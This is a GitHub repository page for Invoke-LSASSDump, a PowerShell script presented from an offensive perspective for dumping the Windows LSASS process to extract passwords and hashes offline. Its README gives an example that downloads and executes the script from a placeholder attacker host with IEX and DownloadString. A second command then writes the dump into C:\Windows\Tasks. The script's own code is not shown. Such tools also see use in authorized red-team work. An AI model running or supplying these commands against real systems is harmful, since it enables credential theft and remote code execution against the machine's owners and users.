Skip to content

0x73unflower/Invoke-LSASSDump

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

Invoke-LSASSDump

A small script to dump the LSASS process via PowerShell. This script utilizes MiniDumpWriteDump which provides process snapshots for debugging purposes. From a offensive perspective, we can utilize it to dump the LSASS process for offline password and hash extraction.

Example

Below is an example on how to use Invoke-LSASSDump:

PS > IEX ((New-Object System.Net.WebClient).DownloadString('http://<YOUR IP>/Invoke-LSASSDump.ps1'))
PS > Invoke-LSASSDump -DumpLocation "C:\Windows\Tasks\lsass.dmp"

About

Dump the LSASS process from PowerShell

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published